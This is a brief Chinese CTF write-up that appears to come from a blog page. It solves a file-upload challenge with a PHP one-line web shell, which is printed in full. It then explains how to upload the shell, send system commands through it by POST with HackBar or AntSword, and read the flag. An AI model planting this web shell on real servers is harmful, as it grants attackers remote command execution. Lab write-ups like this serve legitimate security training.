构造一句话PHP木马
<?php @eval(system($_POST['shell'])); ?>利用eval函数解析$shell的值使得服务器执行system命令
eval函数是无法直接执行命令的,只能把字符串当作php代码解析
这里我们构造的木马是POST的方式上传,那就用MaxHacKBar来执行
创建好的木马上传后记下这个路径:
点击"Load URL"并且把刚才我们上传的文件路径粘贴到后面
接下来把我们要执行的命令以POST的方式赋值给shell就可以命令执行了
最后也是在根目录下找到了flag
cat一下flag
经测试这里发现直接用一句话木马,用蚁剑连接也是可以成功的
也是可以在根目录找到flag
![[SHCTF 2023]——week<span style='color:red;'>1</span>-week3 Web方向详细<span style='color:red;'>Writeup</span>](https://img-blog.csdnimg.cn/img_convert/d5a7117804b984b5dc179f6a3bab1344.png)
![XCTF:MISCall[<span style='color:red;'>WriteUP</span>]](https://img-blog.csdnimg.cn/direct/52ad12b02ad14ce6af2fcff31632441b.png)
![XCTF:warmup[<span style='color:red;'>WriteUP</span>]](https://img-blog.csdnimg.cn/direct/82be025e9aaf4c429b08ebba624159b3.jpeg)
![XCTF:Normal_RSA[<span style='color:red;'>WriteUP</span>]](https://img-blog.csdnimg.cn/direct/b0f1df2f303142fbbf46fb30d3d46d68.png)
![XCTF:level0[<span style='color:red;'>WriteUP</span>]](https://img-blog.csdnimg.cn/direct/701fbf1e774a481f9fe77f2699b97619.png)
